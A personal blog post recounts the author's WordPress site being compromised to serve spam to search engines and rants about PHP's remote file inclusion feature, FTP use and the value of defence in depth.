In which we discover we’ve been bad, and have a rant about why
A couple of weeks ago, I discovered that my site had, apparently, been compromised, but my hosting company had handled it. WordPress had been broken in the process; but I’m not entirely surprised. Nevertheless, I thought everything was now happy.
This morning, though, a letter from Google lets me know: it hadn’t been fixed. My site has, for the past fortnight, been serving up crap to any passing search engine. This can’t be good. I don’t blame my hosting company: what they did do was above and beyond the call of duty, and they can’t be expected to understand and trace every twisty little maze of code paths in WordPress that might result on something being sent back to the client’s screen.*** What it does make me want to rant about, though, is PHP.
PHP is – if you’re not a geek and haven’t heard about it – by far the most common “web-programming” language around today. Its modus operandi is: you intersperse chunks of programming code in and around the static content in your web pages. When your webserver reads a page, it will run the chunks of code as a program. In WordPress’s case, the chunks of code run off to a database and fetch my posts, your comments, and so on, from it, and send them back to a client. Thus, one web page can output many posts, managing them is much easier, and so on. All well and good.
PHP, though, is … well. It’s not exactly the best language for the job, which is being polite about it. I’ve been doing lots of programming in it myself lately, for our Office Intranet, and it’s just not as rigorous as other languages. The syntax doesn’t somehow seem as thorough. Apart from the little differences you always get between languages,* it has little corners that feel slightly wrong when I use them, as if I’m transgressing the boundaries between types of programming object in a bad and dirty way.
That’s just a minor thing, really, just me quibbling. What my big problem is, what makes PHP an utterly unsuitable programming language for its job, is one particular feature much adored by people who want to take control of your website and use it to advertise pr0n and drugs. It’s a feature which is unutterably stupid, so stupid I can’t believe anyone thought it should have been created. PHP will, if you like, go and read a file from anywhere on the internet, and run it for you. Which means that a shifty-looking programmer who gets illicit access to the files on your website only has to add a couple of lines of code, to get complete control of everything. Bang. Like that.
Now, you could say: well, FP, you shouldn’t have been using FTP. And you’re right.** My hosts offer SFTP instead, and I should have been using that. There’s no good reason to use FTP either if you have an alternative available. But that doesn’t mean that the next hole along the line shouldn’t be blocked either. It’s called: defence in depth. At work, we have a high fence round the whole site, and an alarm system just inside it; but that doesn’t mean that we leave the office buildings unlocked. Security shouldn’t be brittle; ideally it shouldn’t be thin either. Once you’ve breached the first layer, the tools to complete the job shouldn’t be left lying around.
* The difference between ‘elseif’ – which is a PHP keyword – and ‘elsif’, Perl‘s spelling of the same thing – will forever damage my brain.
** I have a good story about how weak FTP can be – but it can wait for another time.
*** and, indeed, it’s my own fault; I should right away have compared the live files with my known-good backups.